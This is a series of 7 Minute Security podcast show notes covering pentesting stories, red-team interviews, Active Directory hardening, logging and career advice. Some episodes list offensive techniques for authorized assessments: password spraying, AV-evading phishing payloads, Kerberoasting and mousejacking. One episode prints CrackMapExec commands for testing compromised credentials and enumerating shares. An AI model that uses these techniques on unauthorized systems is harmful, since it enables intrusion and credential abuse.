I often pay a lot of $ for idle time since you pay ~$5/month just for the VM itself, and then a buck and change per hour the box is running - even when it's not cracking anything.

This week on a pentest I wasn't capturing many hashes, and when I finally did it was a really valuable one. So I wanted to throw more "oomph" at the hash but don't have a ton of days to spare.

Enter NPK which lets you submit a hash, decide how much horsepower to throw at it, and even set a max amount of $ to spend on the effort. Super cool! I'm loving it so far!

Note: I did have a heck of a time with the install (I'm sure it was a me thing) so I wrote up this gist to help others who might hit the same issue:

Happy crackin'!

7MS #368: Tales of Pentest Fail Jun 24, 2019

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

In today's episode, I toss myself under the proverbial security bus and share a tale of pentest fail. Looking back, I think the most important lessons learned were:

Scope projects well - I've been part of many over- and under-scoped projects due to PMs and/or sales folks doing an oversimplified calculations, like "URLs times X amount of dollars equals the SOW price." I recommend sending clients a more in-depth questionnaire and even jump on a Web meeting to get a nickel tour of their apps before sending a quote.
Train your juniors - IMHO, they should shoulder-surf with more senior engineers a few times and not do much hands-to-keyboard work at first (except maybe helping write the report) until they demonstrate proficiency.
Use automated pentest tools with caution - they need proper tuning/care/feeding or they can bring down Web sites and "over test" parameters.

7MS #367: DIY Two-Hour Risk Assessment Jun 17, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

Hey! I'm on the road again - this time with a tale encompassing:

How to conduct a mini risk assessment in just two hours. Some ways to consider adding value :
- A discussion of administrative and physical controls
- Create a network inventory using nmap and Eyewitness
- Conduct an external vulnerability scan with Nessus or OpenVAS
How a guy with a gun turned a four-hour road trip into an epic eight hour adventure.

Enjoy :-)

7MS #366: Tales of Internal Pentest Pwnage - Part 3 Jun 16, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

Today's episode was recorded on the way to a new assessment, and since I had nothing but miles and time in front of me, I covered two major stories (probably not in order of importance):

Why I had two get two haircuts in under and hour (spoiler: it's so I didn't look like an idiot for my client)!
An internal pentesting pwnage story - including network and physical security this time around!

Enjoy!

7MS #365: Interview with Ryan Manship and Dave Dobrotka - Part 3 May 30, 2019

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

First, a bit of miscellany:

If you replace "red rain" with "red team" in this song, we might just have a red team anthem on our hands!
If you're in the Twin Cities area and looking for an infosec analyst job, check out this posting with UBB. If interested, I can help make an electronic introduction - and/or let 'em know 7 Minute Security sent ya!

Ok, in today's program we're talking about red teaming again with our third awesome installment with Ryan and Dave who are professional red teamers! Today we cover:

Recon - it's super important! It's like putting together puzzle pieces...and the more of that puzzle you can figure out, less likely you'll be surprised and the more likely you'll succeed at your objective!
Reporting - how do you deliver reports in a way that blue team doesn't feel picked on, management understands the risk, and ultimately everybody leaves feeling charged to secure all the things?

I also asked the questions folks submitted to me via LinkedIn/Slack:

Any tips for the most dreaded part of an assessment (reports)?
How do you get around PowerShell v5 with restrict language mode without having the ability to downgrade to v2?
What's an alternative to PowerShell tooling for internal pentesting? (hint: C# is the hotness)
What certs/skills should I pursue to get better at red teaming (outside of "Hey, go build a lab!").
Are customers happy to get assessed by a red team exercise, or do they do it begrudgingly because of requirements/regulations?

7MS #364: Tales of External Pentest Pwnage May 23, 2019

This episode of the 7 Minute Security Podcast is brought to you by Authentic8, creators of Silo. Silo allows its users to conduct online investigations to collect information off the web securely and anonymously. For more information, check out Authentic8.

This episode features cool things I'm learning about external pentesting. But first, some updates:

My talk at Secure360 went really well. Only slightly #awkward thing is I felt an overwhelming need to change my title slide to talk about the fact that I don't drink.
The 7MS User Group went well. We'll resume in the late summer or early fall and do a session on lockpicking!
Wednesday night my band had the honor of singing at a Minnesota LEMA service and wow, what an honor. To see the sea of officers and their supportive families and loved ones was incredibly powerful.

On the external pentest front, here are some items we cover in today's show:

MailSniper's Invoke-DomainHarvestOWA helps you discover the FQDN of your mail server target. Invoke-UsernameHarvestOWA helps you figure out what username scheme your target is using. Invoke-PasswordSprayOWA helps you do a low and slow password spray to hopefully find some creds!
Once inside the network, CrackMapExec is your friend. You can figure out where your compromised creds are valid across the network with this syntax:

crackmapexec smb 192.168.0.0/24 -u USER -p ‘PASSWORD’ -d YOURDOMAIN

You can also find what shares you have access to with:

crackmapexec smb 192.168.0.0/24 -u USER -p ‘PASSWORD’ -d YOURDOMAIN --shares

Sift through those shares! They often have VERY delicious bits of information in them :-)

7MS #363: Interview with Ryan Manship and Dave Dobrotka - Part 2 May 15, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

Yuss! It's true! Dave and Ryan are back!

Back in episode #326 we met Ryan Manship of RedTeam Security and Dave Dobrotka of United HealthGroup and talked about their cool and exciting careers as professional red teamers.

In this follow-up interview (which will be broken into a few parts), we talk through a red team engagement from start to finish. Today we cover questions like:

Who should have a red team exercise conducted? Who NEEDS one?
How do you choose an objective that makes sense?
What do you do about push-back from management and/or scope manipulation? (“Don’t phish our CEO! She’ll click stuff! Attack our servers, just not the production environment!!!”). Spoiler alert: your clients need to have intestinal fortitude!
What’s better - a “zero knowledge” red team engagement or a collaborative exercise between testers and their clients?
How do you attack a high-security bunker?!
How do you conduct a red team exercise without ending up in jail? What does your “get out of jail” card get you - and NOT get you?

7MS #362: My Dear Friend Impostor Syndrome May 09, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

Today I take a walk (literally!), get chased by a dog (seriously!) and talk about impostor syndrome and feelings of self-loathing and doubt as I get ready to speak at Secure360 next week (insert wah-wah-waaaaaaahhhhhhh here).

How do you deal with impostor syndrome? Personally, I'm finding some success in squashing it by forcing myself into situations where I feel like a fraud - over and over again! Over time, I feel slightly less like a sham and a bit more like I know what I'm talking about. Specifically, in this episode I talk about:

The thrill of getting a presentation accepted at a conference, and the dread and fear that follows
The awful nightmare I have the night before I speak in front of others
Shaking off nerves when your talk is accompanied by a sign language interpreter
Finding your "voice" and getting the confidence to share/present your knowledge in a way only you can

I also share the outline to my "So You Wanna Start a Security Company?" talk, which includes:

What are the telltale signs that you should start a security company?
How do you find business when everybody and their mom seems to have a security offering?
What are some of the tools/services/people that can help your business succeed?

7MS #361: Logging Made Easy May 03, 2019

Today we're talking about Logging Made Easy, a project that, as its name implies...makes Windows endpoint logging easy! I love it. It offers a simple, digestible walkthrough of several short "chapters" to get started. These chapters include:

Chapter 1 - Set up Windows Event Forwarding

Chapter 2 – Sysmon Install

Chapter 3A – Database (Easy Method)

Chapter 3B – Database (Manual Method)

Chapter 4 - Post Install Actions

Besides having a small issue with a batch script (resolved as of 5/3) and a another snafu (that's probably my fault), it's a simple and effective way to get logging spun up in your environment!

7MS #360: Active Directory Security 101 - Part 2 Apr 25, 2019

This episode of the 7 Minute Security podcast is brought to you by Netwrix. Netwrix Auditor empowers IT pros to detect, investigate and resolve critical issues before they stifle business activity, and proactively identify and mitigate misconfigurations in critical IT systems that could lead to downtime. For more information, visit netwrix.com.

In today's program we continue a series on fundamental Active Directory security that we started back in episode 327. I took all the things I talked about in that episode, as well as the new additions discussed today:

Finding your most vulnerable AD abuse paths with BloodHound. For a two-part pentest tale showing how BloodHound can be used/abused by attackers, check out episodes 353 and 354.
Get a deep-dive look at your AD machines, users, shares, OS versions and more with Network Detective.
How to de-escalate local admins (and prevent them from over-using/abusing the use of their privileged account)
Although I haven't tested it yet, Logging Made Easy looks like an awesome and free way to get some entry-level logging setup in your environment. Can't wait for a good lab day to play!

Here are ALL the AD Security 101 tips in a delicious [gist].

7MS #359: Windows 10 Security Baselining Apr 19, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

In this episode I explore some ways you can turn up the security heat on your Windows workstations by mapping their security to a hardening standard and/or baseline. Specifically, I cover:

I think one path to success is to use the Windows SCT as a way to create a baseline, and then use it - plus some of the other guides and standards - to gradually turn the security screws on the OS. Don't just import a GPO template and turn on 123,456,789 settings at once. You'll likely bring the network to its knees!

Got a better/faster/stronger way to accomplish baselining? Let me know!

7MS #358: 4 Ways to Write a Better Pentest Report Apr 16, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

This week we're talking about everybody's favorite topic: REPORT WRITING! Yay! The peasants rejoice! In the last few months I've seen a lot of reports from other companies, and here are a few key problems I see with them:

Too long - overall these things are waaAAaAaaAayyyYYYYYYyyy too long. I see reports where the analyst has copied and pasted an entire Nessus report into the main report. Yikes. That makes these things weigh in at hundreds(!) of pages.
Too techie - these reports look like their written from one techie to another. Nothing wrong with that, really, however in many cases the key person that needs to "get it" is a manager or C-level position who needs to understand the risks in plain English.
No narrative - the reports are just a long laundry list of vulnerabilities without any context of how the pentest was conducted or which vulns should be fixed first.
Weak remediation - most of the findings are accompanied by whatever remediation instructions are provided by the vuln-scanner or other tool. We can do better than this!

How? Listen to today's episode :-).

Oh, and don't forget to come to the next 7MS User Group meeting on Monday, April 22! Details here!

7MS #357: 7 Minutes of IT and Security Tips Apr 11, 2019

Today I'm launching an ongoing series called 7MOIST. It stands for:

7
Minutes
of
IT
and
Security
Tips

The wildest, craziest, nuttiest part of this series is that each episode will be 7 minutes long!

I know, I know! You're saying, "Wait a sec, bub, isn't that why this podcast is called 7 Minute Security in the first place?" And yes, you'd be right.

Basically, this is my way of going old school and getting back my podcast "roots" by delivering an episode before we had an intro jingle, interviews, sponsors, banter about hot cocoas or an outro song. Nothing but delicious content today friends, Enjoy!

Today's theme is:

Windows command line shortcuts and tips: Creative ways to play with cmd

Basically, you can do Windows Key + R then type cmd and Enter for quick access to command line.

But lets do some more fun stuff. Wanna open a command window from the desktop and launch a command in one swoop? Try this:

cmd /k

For example:

cmd /k ping 192.168.0.1

The cmd /k part opens a command window, and then ping 192.168.0.1 can be whatever command you also want to run on the fly.

And if you want to start programs and/or open files right from the command line, you can do that (in most cases) by just typing the program name, like:

notepad

Or, get really fancy and add a document name after the command. For example:

notepad meow.txt

If meow.txt doesn't exist, Notepad will simply ask you to create it!

Finding files faster

Call me crazy, but the Windows find/search feature sometimes doesn't find stuff that I know is there. So I still like using old school DOS commands for this. I might do something like:

cd \ dir /s *brian*.doc

The dir stands for directory, and the /s tells the system to search recursively.

See 7ms.us for the rest of today's show notes!

7MS #356: Faster Hard Drive Forensics with CyLR and CDQR Apr 03, 2019

This episode is brought to you by ITProTV. Visit https://www.itpro.tv/7minsec for over 65 hours of IT training for free!

In today's episode I talk about some cool tools you can use to start a hard drive forensics investigation more quickly. Resources talked about on today's podcast include:

Forensics 101 - a talk I did for the 7MS user group in January
The Digital Forensics Survival Podcast is a FANTASTIC resource to learn more about forensics
CyLR works great to do quick live disk artifact-gathering on a suspect system, and then...
CDQR can step in and analyze the info you gathered with CyLR and spit out helpful reports to begin your investigation
YouTube video of the CyLR/CDQR creators demonstrating the tools and doing a live demo of artifact collection/analysis
Did you miss this week's mousejacking Webinar? Also, DIY $500 Pentest Lab - Part 2 is up on YouTube. And we've got a fun Webinar on MITRE ATT&CK coming up in May. Sign up here

7MS #355: Mousejacking! Mar 27, 2019

This episode is brought to you by Netwrix Auditor, which empowers IT pros to detect, investigate and resolve critical issues before they stifle business activity, and proactively identify and mitigate misconfigurations in critical IT systems that could lead to downtime.

In this episode, we talk about the Mousejacking attack, which allows someone with a crazy radio (or other similar device) to inject keystrokes into vulnerable keyboards and mice. Yikes!

Not trying to be a doom and gloom guy here, but using this Mousejacking attack, pentesters/attackers could take over your entire Active Directory in just seconds - from the parking lot! I'll talk about how exactly that could be done - as well as ways to defend against mousejacking - in today's episode.

If this episodes primes your appetite for more Mousejackin' fun, join me and my pals Paul and Dan for a deep-dive Mousejacking Webinar on Tuesday, April 2 at 12 p.m. CST!

Some resources talked about in today's episode:

Mousejack.com - great demo video of the attack
Crazy Radio PA - one hardware option to perform mousejacking attacks
Custom mousejacking firmware for Crazy Radio PA
Jackit - tool for conducting mousejack attacks
A cool Twitter thread on using mousejacking for pentests
Vulnerable devices - nice repository of devices known to be susceptible to mousejacking attacks

7MS #354: Tales of Internal Pentest Pwnage - Part 2 Mar 25, 2019

Today's episode is the thrilling, exciting, heart-pounding conclusion of Tales of Internal Pentest Pwnage - Part 1. In this episode, we cover the final "wins" that got me to Domain Admin status (and beyond!):

Got DA but can't get to your final "crown jewels" destinations? How about going after the organization's backups (evil grin!)
Got DA but stuck to find hot leads to where the crown jewels are? Get snoopy and go through people's files, folders and...bookmark caches! (evil grin #2!)
If your nmap/eyewitness scan turns up Web sites with simply an IIS default landing page or "It works!" Apache page on it, there's probably more there than meets the eye.

We also talk about lessons learned from this pentest - both things done well and things the org can do to make the next pentester's job a lot harder.

7MS #353: Tales of Internal Pentest Pwnage - Part 1 Mar 22, 2019

Buckle up! This is one of my favorite episodes.

Today I'm kicking off a two-part series that walks you through a narrative of a recent internal pentest I worked on. I was able to get to Domain Admin status and see the "crown jewels" data, so I thought this would be a fun and informative narrative to share. Below are some highlights of topics/tools/techniques discussed:

Building a pentest dropbox

The timing is perfect - my pal Paul (from Project7) and Dan (from PlexTrac) have a two-part Webinar series on building your own $500 DIY Pentest Lab, but the skills learned in the Webinars translate perfectly into making a pentest dropbox. Head to our webinars page for more info.

Securing a pentest dropbox

What I did with my Intel NUC pentest dropbox is build a few VMs as follows:

Win 10 pro management box with Bitlocker drive encryption and Splashtop (not a sponsor) which I like because it offers 2FA and an additional per-machine password/PIN. I think I spent $100/year for it.
Kali attack box with an encrypted drive (Kali makes this easy by offering you this option when you first install the OS).

Scoping/approaching a pentest

From what I can gather, there are (at least) two popular schools of thought as it relates to approaching a pentest:

From the perimeter - where you do a lot of OSINT, phish key users, gain initial access, and then find a path to privilege from there.
Assume compromise - assume that eventually someone will click a phishing link and give bad guys a foothold on the network, so you have the pentester bring in a Kali box, plug it into the network, and the test begins from that point.

Pentest narrative

For one of the tests I worked on, here were some successes and challenges I had along the way:

Check out the show notes at 7MS.us as there's lots more good info there!

7MS #352: Recap of Rad Red Team Training Mar 14, 2019

I recently had the awesome opportunity to take the awesome Real World Red Team course put on by Peter Kim, author of The Hacker Playbook series.

TLDR and TLDR (too long don't listen): go take this training. Please. Now. The end.

If you want to hear more, check out today's podcast episode where I talk about all the wonderful tidbits I learned from Peter during the training, including:

Doppelganger attacks - does your target have a frequently used site like mail.company.com? Try buying up mailcompany.com with a copy of their email portal (using Social Engineer Toolkit), and the creds might come pouring in!
Get potential usable creds from old breaches (Adobe, Ashley Madison, LinkedIn, Spotify)
Password spraying is often really effective to get you your first set of creds - check out Spray or DomainPasswordSpray
When creating phishing payloads, Veil will help you craft something to bypass AV
When you're in a network and have grabbed your first set of creds, run BloodHound or SharpHound to map the Active Directory and find your high-value targets
Check systems for MS17-010 for some potential easy wins
Look for potential accounts that you can Kerberoast

For more info visit today's show notes on 7ms.us

7MS #351: Turn Windows Logging up to 11 Mar 06, 2019

Today's episode is brought to you by NoteCast. Try it free for 60 days (no credit card required) and enter code 7MS when completing your signup.

In today's episode, I talk about how the level of Windows server/client logging out of the box is...not really awesome. I then look at how we can create a GPO that turns logging "up to 11" using some free tools and cheat sheets.

If you want to simulate this in your own lab by building out an Active Directory environment, check out part 1 of a Webinar series we've been working on called DIY $500 Pentest Lab, which helps you select hardware/software components you need to build a lab. Then coming up soon is part 2 where we'll build out a Windows 2012 server, promote it to a DC, join a couple clients to it, and prepare to start hacking!

Once your AD and clients are setup, you can start slurping up their logs for free using a Papertrailapp account (not a sponsor). I went ahead and paid for a $7/mo plan so I could get 1GB of storage and a little longer log retention.

Then, I used LOG-MD to audit a Windows workstation and get some great recommendations on what registry settings and security policy tweaks to make. Finally, I started turning this into a GPO so I could begin pushing out these settings en masse. My living/breathing document to capture all this information is in a new gist that I plopped here.

7MS #350: Interview with Lewie Wilkinson of Pondurance Feb 20, 2019

Today's featured interview is with Lewie Wilkinson, senior integration engineer at Pondurance. Pondurance helps customers improve their security posture by providing a managed threat hunting and response solution, including a 24/7 SOC. Lewie joined me via Skype to talk a lot about a topic I'm fascinated with: incident response! I had a slew of questions and topics I wanted to discuss, including:

Fundamentals of threat hunting
- What is threat hunting?
- What are the fundamentals to start mastering?
- How can someone start developing the core skills to get good at it?
How can sysadmins/network admin, who have a busy enough time already just keeping the digital lights on, handle the mounting pressure to also shoulder security responsibilities as part of their job duties?
What training/cert options are good to build skills in threat hunting?
Lets say you know one of your users has clicked something icky and you suspect compromised machine/creds. You pull the machine off the network and rebuild it. How do you know that you've found/limited the extent of the damage?
Are attackers on networks typically wiping logs on systems as the bounce around laterally?
Anything to add to the low-hanging hacker fruit list?
Why is it so critical to not just have logs, but have verbose logs with rich data you need in an investigation?
When does it make sense to outsource some security responsibilities to a third party?

Learn more about Pondurance at their Web site and Twitter.

7MS #349: Interview with Ameesh Divatia of Baffle Feb 14, 2019

Today's featured interview is with Ameesh Divatia, cofounder and CEO at Baffle. Baffle offers an interesting approach to data protection that they call data-centric protection, and the idea is you need to protect information at the record level, not just the sort of traditional approach of "encrypt at rest" and call it good.

Ameesh sat down with me to talk about a lot of high level data and security privacy concerns, specifically:

Data privacy - it seems like every 15 minutes there's yet another massive data breach. Why is this continuing to happen?
What are the basic security/privacy fundamentals that companies should be doing but, for whatever reason, are not?
GDPR
- What does GDPR mean to the average person?
- Why it was a data privacy wake-up call for so many?
- Have there been any sizable fines issued thus far?
How can data that companies collect on us be processed in a way that doesn't compromise security?

Learn more about Baffle at their Web site and Twitter.

7MS #348: Cell Phone Security for Tweenagers Feb 06, 2019

Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode focuses on security for families/kids - specifically cell phone security for tweenagers. We hit a milestone in the 7MS household this year because my tweenage son got an iPhone, much to my...uhh...not excitement. So we decided to wrap the following technical and administrative controls around the phone to hopefully make it a pleasant experience for everybody:

Technical

I really dig the Apple family sharing controls, which let you do things like:
- Have the phone "sleep" at certain hours
- Limit the total amount of screen time per day
- Require you to authorize any apps that are downloaded
We turned on OpenDNS to help filter inappropriate content.
I also use UniFi access points, which allow you to create a separate wireless SSID with a voucher system enabled on it. That way, you can hand out vouchers to kids with a defined amount of access attached to it (like 1 hour or whatever you like). We use it as a reward once the kids' chores and homework is complete.

Administrative

For our tweenager with the phone, we wrote up an agreement about acceptable use of the phone - including guidelines around the device's physical security, passwords and PINs, appropriate content, etc. You can grab a copy here

7MS #347: Happy 5th Birthday to 7MS Jan 31, 2019

Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Psst...my pals Paul and Dan are hosting a Webinar all about building your own pentest lab for ~$500. This is happening next Tuesday, Feb. 5 at 12 p.m. CST. Sign up here.

Today I thought I'd kind of hit the reset/refresh button and give you a little background on:

My self-diagnosed job ADHD (check out my series on career guidance for the even longer version :-/)
The history of 7MS the podcast (inspired by 10 minute podcast)
How the podcast helped launch 7MS the business
The various resources 7MS has worked on to help you in your IT/security career, such as:
- BPATTY - Brian's Pentesting and Technical Tips for You
- A Slack channel full of cool security people who want to help you learn, and learn from others as well
- Vulnerable VMs to help you practice hacking, such as Billy Madison and Tommy Boy

Thinking about starting your own company? Come see me at Secure360 this summer for my talk called So You Want to Start a Security Company.

7MS #346: Baby's First Red Team Engagement Jan 24, 2019

WARNING: Today's episode is a bit of an experiment, and I hope you'll hang in there with me for it.

I had the opportunity to do a week-long red team engagement, and so I recorded a little summary of the experience at the end of each day, and then pasted them all together to make today's episode.

Listening back to the episode now, it sounds like I might belong on a funny farm. But I thought it would be fun to give you a first-hand account of the experience so you can share the stomach-twisting journey with me.

7MS #345: Interview with Amber Boone Jan 16, 2019

Coming up on Tuesday, January 22 I'll be doing a Webinar with Netwrix called 4 Ways Your Organization Can Be Hacked. It features a Billy Madison theme and pits evil Eric Gordon against sysadmin Billy Madison. Hope you'll join us - it'll be fun!

Today I'm pleased to welcome Amber Boone to the program! She is an awareness builder for a cybersecurity vendor (insert dramatic music!), and Amber was gracious enough to help me pilot a new style of interview called 7 Minute Interviews with 7MS.

I basically asked Amber a "serious" question about security, then a goofy one, then another serious, then another goofy...and so on and so forth until the 7 minutes was up.

Amber answered important questions such as:

Would she rather fight 100 duck-sized horses, or 1 horse-sized ducks?
What basic security effort could orgs address without investing a huge amount of dollars and effort?
Would she rather be a giant hamster or a tiny rhinoceros?

If you'd like to check out what Amber's doing online, check out her LinkedIn, her side project YourLegacies.com or follow Amber on Twitter.

Interested in doing a 7 minute interview with 7MS? Head here.

7MS #344: Announcing the 7MS User Group Jan 09, 2019

I'd like to coordially invite you to the first-ever 7MS User Group meeting, coming up Monday, January 14th at 6 p.m.! You can attend physically, virtually or both! All the info you need is in today's podcast, as well as here. See you there!

7MS #343: Interview with Dan DeCloss Jan 02, 2019

Psssst! Wanna come to the first ever 7MS User Group meeting? It's coming up on January 14th. You can join in person or virtually! Head here for more information!

Dan DeCloss (a.k.a. wh33lhouse on Slack and @PlexTracFTW aon Twitter) joined me virtually in the studio to talk about his passion project, PlexTrac. Dan also shared his insight on all sorts of great topics, including:

How to bleed "purple" and get comfortable playing on both the attacking and defending side of the house
What areas are we failing in defending our networks - and what kind of things can we do make our networks more resilient?!
What's the biggest challenge you see on both the blue and red team side (spoiler alert: communication is super important!)?
How do you break into a cyber security position that requires X years of experience when you have zero experience (Dan offers a great tip: don't be intimidated by requirements on job postings...they're often excessive/unreasonable)
Ways to show security aptitude on your resume without necessarily having a bunch of experience:
- Build a home lab
- Create a blog
- Bug bounties
- Make a podcast
- Get certs (or at least get enrolled in them)
Some history on PlexTrac and what inspired Dan to create it

7MS #342: Interview with Matt McCullough Dec 27, 2018

Matt McCullough (a.k.a. Matty McFly on Slack) joined me in the studio to talk about his wild and crazy path to security. He started literally with no technical experience, but through a lot of hard work, aggressive networking and taking advantage of educational and career opportunities, Matt now rocks a SOC job. Matt and I sat down to talk about a lot of good stuff:

How to start an IT career as "the family IT guy"
Leveraging a higher education (at places like Lake Superior College to meet people of influence and start networking like a beast
Entry level sysadmin and helpdesk jobs are fun - great opportunities to make the most of the position, build your skills and stretch yourself outside your comfort zone
MSPs (Managed Service Providers) are another great way to see different clients/verticals/systems and the various requirements that go into supporting them. From there, look for opportunities to start securing those organizations, as many MSPs don't dabble heavily into the security realm.
If you're going to school for cybersecurity training, look for ways to leverage your status to get discounts on security training, such as with SANS
Competitions like CCDC are awesome. You're given a handful of servers that are full of vulnerabilities, and you essentially are tasked with defending a network against a professional group of pentesters/redteamers. You even have to deal with real-life "injections" (other random emergencies and mock customers to deal with) while you're in the thick of the battle!
Join local cyber clubs (or start your own)! Looking for a fun CTF to get started in a group setting? Try hacking the OWASP Juice Shop
Attend security conferences(or start your own)!

...more notes at 7MS.us!

7MS #341: How to Fix Unquoted Service Paths Dec 19, 2018

Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

In today's episode we talk about how to identify - and resolve - unquoted service paths. Maybe you've seen this pop up in your vulnerability scanner and aren't quite sure what the risk is or how to fix it - and maybe more importantly, how to fix it at scale if need be. That's the technical conundrum I faced this week, so I talk about some resources to help you identify this risk and get it out of your environment!

And here's a gist I wrote that walks you through everything step by step:

7MS #340: Forensics 101 Reloaded and The CryptoLocker Music Video Dec 13, 2018

Last week I had the fun privilege of speaking twice at the Minnesota Goverment IT Symposium on the following topics:

Forensics 101: This was a "reloaded" talk that I started earlier this year (and covered in episode 299 and 300). At a high level, the talk covered:
- Hunting malware with Sysinternals
- Creating system images with FTKImager
- Dumping memory with Volatility and ripping icky stuff out of memory images with their 1-2-3 punch article
- Seeking out DNS tunneling/exfil using Security Onion
Pecha Kucha: this talk, which is in a 20x20 format is part PSA about how to not click bad links, part cautionary tale (and music video!) about how the promise of a free burrito can ruin your business! Check out the video here, and special thanks to Joe Klein for providing the awesome pics to go along with the storyboard - you're a champ.

Also, check out the Digital Forensics Survival Podcast which is awesome for learning more about forensics and IR.

7MS #339: A Pulse-Pounding Impromptu Physical Pentest Dec 06, 2018

On a recent security assessment I was thrown for a loop and given the opportunity to do a two-part physical pentest/SE exercise - with about 5 minutes notice(!). Yes, it had me pooping my pants, but in retrospect it was an amazing experience. This is the mission I was given:

See if you can get the front desk staff to plug in a USB drive - I posed as John Strand and armed myself with a fake resume. And as I approached the front desk I suddenly panicked and thought, "What if the front desk person is a BHIS fan?!?!?"
Break into a door with weak security and steal equipment - I was given a plastic shiv and asked to try and get into a secure area in the middle of a busy office morning. No pressure, right?

Was I successful? Was I arrested? Find out in today's episode!

7MS #338: SIEMple Tests for Your SIEM Solution Nov 28, 2018

Today's episode talks about some SIEMple tests you can run on your SIEM (OMg see what I did there? I took the word simple and made it SIEMple. Genius stuff, right? And there's no extra charge for it!). And if you're just now starting to shop around for a SIEM, this episode also has an extensive questionnaire you can use to put your vendors' feet to the fire and see what they're made of! Along with today's episode, I'm releasing a companion gist that contains:

Questionnaire - a series of questions you can ask SIEM vendors to gather as many data points about their products and services as possible
SIEM tests - a few tests you can conduct on your internal/external network to see if your SIEM solution indeed coughs up alerts

Enjoy!

7MS #337: Happy Secure Thanksgiving Nov 21, 2018

Happy Thanksgiving! In this episode I:

Share some things I'm thankful for - like you!
Talk about a fun episode I'm working on that has some SIEMple tests you can use to test your SIEM (omg see what I did there? So clever)
Announce the 7MS user's group that will start meeting in the south metro area of Minnesota in January of 2019!
Tell you a story about a kid that peed his pants in front of me (you're welcome in advance)

Hope you can take some time off and enjoy your friends/family this week and weekend. Have a blessed Thanksgiving!

7MS #336: How to Succeed in Business Without Really Crying - Part 6 Nov 14, 2018

Welcome to part 6 of our miniseries all about the ups, downs, trials and tribulations of being a small, one-person security start up. In this episode I detail out all the software/services I use to run 7 Minute Security, LLC in hopes it might help you run your company as well! I started a new gist to complement this episode, which you can get by clicking here. Enjoy!

7MS #335: Cool Stuff I Just Learned From Red Teamers Nov 08, 2018

Today I'm excited to brain-dump a bunch of cool stuff I learned at a red team conference called ArcticCon this week. Although this conference observes the Chatham house rule I'm just going to talk about a few things from a general, high level. Specifically, I asked several heavy-hitting red teams these burning questions:

When you red team an org, do you usually assume compromise (i.e. plug a Kali box into the network and go from there) or are you crafting email payloads from scratch, trying to get a reverse shell past various email/firewall filtering efforts?
Does your management seem to "get it" when it comes to the true value of having a red team? Or do they put limits on your efforts - like "Wait a sec, don't phish my boss!" Or "OMG hold on, don't pwn those systems!"

7MS #334: IT Security Horrors That Keep You Up at Night Nov 01, 2018

This week I got to celebrate Halloween with my friends at Netwrix by co-hosting a Webinar called IT Security Horrors That Keep You Up at Night. The content was a modified version of the Blue Team on a Budget talk I've been doing the past year or so, and essentially focuses on things organizations can do to better defend their networks without draining their budgets.

The presentation had a Child's Play theme and showed Chucky trying to hack Andy's company via:

Phishing
Abusing bad domain passwords
Abusing bad local admin passwords
Responder attack
Lack of SMB signing

Each attack was also followed up my some advice for how to stop it (or at least slow down its effectiveness).

The presentation itself was a blast and I learned some good public speaking lessons as a result:

Get your slides done early! - when co-presenting, it makes sense that they want to see your slides sooner than the day of! :-)
Don't freak out about an audience of "none" - I always think Webinars are weird because you can't see people's faces or interpret their body language to get a feel for whether they appreciate your humor or understand the points you're trying to make. I learned you just gotta keep pushing forward "blind" whether you like it or not.
Setup a redundant presentation system - ok so file this one with the irrational fears dept, but I actually had a second laptop ready with my presentation loaded, and the laptop was connected to a cell hotspot I setup on a tablet. That way if my machine BSOD'd or Internet went out in my house, I could quickly rejoin the presentation and pick up where I left off. Safe or psycho? You decide!

Happy belated Halloween!

7MS #333: Pentesting Potatoes Oct 26, 2018

This week I was in lovely Boise, Idaho doing some security assessment work. While I was there I got to hang out with Paul Wilch and some of the Project7 crew and picked up a lot of cool tools and tips I share in today's episode:

The Badger Infosec group did a cool Rubber Ducky demo.
Dan from DDSec did a demo of PlexTrac which is "the last cybersecurity reporting tool you will ever need." I'm actually going to use PlexTrac for my next few assessments and am working to line up a future interview with Dan to learn even more.
Paul gave a demo of Parrot which is cool and Kali-like. However, when Paul and I did a side-by-side test with Kali, we noticed that Parrot kind of barfed when it set out to do an Eyewitness report.
After meeting Paul's son, Simon, I'm optimistic about the future IT/security leaders in this country. There are some wicked-smart youth out there!
Paul gave me a hotel keycard lockpick/shiv (his own creation!) and staged a few doors for me to try and bypass. He made it interesting when he promised to throat-punch me if I failed! Thankfully, I got off without any throat punches!

7MS #332: Low Hanging Hacker Fruit Oct 17, 2018

In this episode I'm releasing a new document aimed to help organizations eliminate low hanging hacker fruit from the environment. The document contains (relatively) cheap and (relatively) easy things to implement. And my hope is it can be a living/breathing document that will bulk up over time. Got things to add to this list? Then please comment on the gist below!

7MS #331: How to Become a Packtpub Author - Part 3 Oct 10, 2018

It's done! It's done!! It's DONE!!!

That's right mom, my PacktPub course called Mastering Kali Linux Network Scanning is done!

In today's episode I:

Recap the course authoring experience
Explain my super anal retentive editing process that takes 4 hours for every 10 minutes of produced video
